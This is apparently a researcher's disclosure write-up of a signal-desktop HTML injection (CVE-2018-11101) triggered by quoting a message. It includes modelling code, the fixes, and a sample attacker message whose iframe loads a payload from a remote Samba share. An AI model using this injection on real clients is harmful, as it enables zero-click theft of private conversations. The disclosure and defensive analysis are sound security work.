signal-desktop HTML tag injection variant 2

This is a new story about how another casual conversation uncovered a huge security hole in one of the most reliable messaging services.

New story time for CVE-2018-11101

TL;DR: upgrade to signal-desktop v1.11+

After publishing the advisory and write-up for CVE-2018-10994, I was contacted on Twitter by Matt Bryant (@IAmMandatory), with whom I had been talking since Alfredo showed the first PoC. He told me: «I could still pop [the vuln] in the patched [version]» and advised me to try the following: write a message with HTML content and simply reply to it. Holy shit!

We immediately contacted the Signal Security Team again, and they told us they were already aware of it and were rolling out a new, refactored release (v1.11.0) that solved this and the previous issue in a better way.

During my previous research I had also noticed that the app's Content Security Policy was missing the directive that governs iframes (for framed content the browser falls back from frame-src to child-src to default-src; if none of them is set, nothing restricts what can be framed), and that directive would have deterred this attack. I was thinking of sending a PR, but then this variant came up, so I recommended adding it in the advisory we sent by email, and the Signal team applied it right away.

Basically, the attack is the same as before, except that it needs two messages: the injection (a message whose body carries the HTML) and a reply that quotes it. The HTML gets rendered when the quote is displayed; the reply itself can contain any text, as shown in the screenshot.
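To make the two pieces above concrete, here is an added example (my own illustration, not Signal Desktop's code) that models both the quote-rendering sink and the CSP check. It renders a reply's quoted message with and without HTML escaping, extracts any iframe the rendered quote would create, resolves a UNC-style src against a file:// page the way the WHATWG URL parser does, and applies the CSP fallback chain (frame-src, child-src, default-src) to decide whether the frame may load. The page path, the message text, the 203.0.113.10 share address and the two policies are constructed for the example; the 'self' matching is a simplified model, not Chromium's exact file: origin rules.

```javascript
// Added example, not Signal Desktop's code. Models the reply/quote injection
// sink and the CSP directive that decides whether an injected <iframe> loads.

// Minimal HTML escaper: the fix for a text-to-markup sink is escaping, not filtering.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => (
    { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' }[c]
  ));
}

// Vulnerable quote renderer: the quoted body is interpolated raw, so HTML in
// message 1 is interpreted as markup when message 2 replies to it.
function renderQuoteVulnerable(quote) {
  return `<div class="quote"><span class="author">${escapeHtml(quote.author)}</span>`
    + `<div class="text">${quote.text}</div></div>`;
}

// Hardened quote renderer: same markup, but the body is escaped.
function renderQuoteFixed(quote) {
  return `<div class="quote"><span class="author">${escapeHtml(quote.author)}</span>`
    + `<div class="text">${escapeHtml(quote.text)}</div></div>`;
}

// Pull iframe src attributes out of rendered markup (a regex is enough for this model).
function extractFrameSrcs(html) {
  const out = [];
  const re = /<iframe\b[^>]*\ssrc=["']([^"']+)["']/gi;
  let m;
  while ((m = re.exec(html)) !== null) out.push(m[1]);
  return out;
}

// Parse a Content-Security-Policy value into directive -> source list.
// A repeated directive is ignored after its first occurrence, as in browsers.
function parseCsp(policy) {
  const directives = new Map();
  for (const part of policy.split(';')) {
    const [name, ...sources] = part.trim().split(/\s+/).filter(Boolean);
    if (name && !directives.has(name.toLowerCase())) directives.set(name.toLowerCase(), sources);
  }
  return directives;
}

// Fallback chain for nested browsing contexts: frame-src, then child-src, then
// default-src. With none of them present nothing restricts what can be framed.
function effectiveFrameSources(directives) {
  for (const name of ['frame-src', 'child-src', 'default-src']) {
    if (directives.has(name)) return directives.get(name);
  }
  return null;
}

// Simplified source-expression matching. 'self' compares scheme and host, which
// is what separates file://host/share/... from the app's own file:///... page.
// Assumption: real Chromium has extra rules for file: origins; this is a model.
function sourceMatches(source, pageUrl, frameUrl) {
  if (source === "'none'") return false;
  if (source === '*') return true;
  if (source === "'self'") {
    return frameUrl.protocol === pageUrl.protocol && frameUrl.host === pageUrl.host;
  }
  if (/^[a-z][a-z0-9+.-]*:$/i.test(source)) return frameUrl.protocol === source.toLowerCase();
  try {
    const host = new URL(source.includes('://') ? source : `${frameUrl.protocol}//${source}`);
    return host.protocol === frameUrl.protocol && host.host === frameUrl.host;
  } catch {
    return false; // wildcard hosts and other forms are not modelled here
  }
}

// Would <iframe src=frameSrc> inside the page at pageHref be allowed to load?
function iframeAllowed(policy, pageHref, frameSrc) {
  const pageUrl = new URL(pageHref);
  const frameUrl = new URL(frameSrc, pageHref); // '\\host\share\x' resolves to file://host/share/x
  const sources = effectiveFrameSources(parseCsp(policy));
  if (sources === null) return true;
  return sources.some((s) => sourceMatches(s, pageUrl, frameUrl));
}

// End to end: which frames actually load when message 2 quotes message 1?
function framesLoadedByQuote(render, policy, pageHref, quote) {
  return extractFrameSrcs(render(quote))
    .filter((src) => iframeAllowed(policy, pageHref, src))
    .map((src) => new URL(src, pageHref).href);
}

// Constructed sample data (not from the advisory): an attacker message pointing an
// iframe at a UNC path, and hypothetical policies without and with a frame directive.
const PAGE = 'file:///C:/Signal/background.html';
const MESSAGE_ONE = { author: 'attacker', text: '<iframe src="\\\\203.0.113.10\\share\\payload.html"></iframe>' };
const CSP_WITHOUT_FRAME_DIRECTIVE = "script-src 'self'; style-src 'self' 'unsafe-inline'";
const CSP_WITH_CHILD_SRC = "child-src 'self'; script-src 'self'; style-src 'self' 'unsafe-inline'";

console.log(framesLoadedByQuote(renderQuoteVulnerable, CSP_WITHOUT_FRAME_DIRECTIVE, PAGE, MESSAGE_ONE));
console.log(framesLoadedByQuote(renderQuoteVulnerable, CSP_WITH_CHILD_SRC, PAGE, MESSAGE_ONE));
console.log(framesLoadedByQuote(renderQuoteFixed, CSP_WITHOUT_FRAME_DIRECTIVE, PAGE, MESSAGE_ONE));
```

Note that either fix alone closes the chain shown here: escaping the quoted body removes the iframe, and a frame directive restricted to 'self' stops the remote share from loading even if markup does get through. Shipping both is the defence-in-depth position, which is what the refactored release plus the added directive amounts to.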

A new video

The response to our first report included this claim: «Exploiting this requires the attacker to first manually place malware (a malicious JavaScript file) on your computer or on a Samba network share that your computer is already connected to.»

That claim made it look as if we weren't telling the truth, so I made a new video (thanks for making me work some more during my vacation) proving otherwise.

Thanks Javier for creating the public Samba share and making this video possible.

The video shows what we stated before: the victim, without any interaction on their part, gets pwned by the attacker with a payload hosted on a remote Samba share (located in the USA, with the victim in Brazil). That payload exfiltrates all of the conversations the victim has had, defeating the purpose of having an encrypted chat. In short, it is remote, zero-click code execution inside the client through HTML tag injection. To clarify, we never claimed System RCE, that is, being able to get a remote shell or open calc.exe. We did try that path but were unsuccessful and didn't pursue it any further. As I mentioned in the first write-up, we managed to produce segfaults on Alfredo's machine but couldn't reproduce them on mine, so System RCE might be possible, though it requires further investigation.

I tweeted about the making of this video, and before it was published Josh publicly apologized and the team emailed us an apology too. As I answered them: apology accepted.

I would love to see someone else reproducing our findings :). It's really easy: you just need a publicly accessible Samba share hosting the PoC file, and then run the exploit against a pre-1.11 signal-desktop as seen in the video.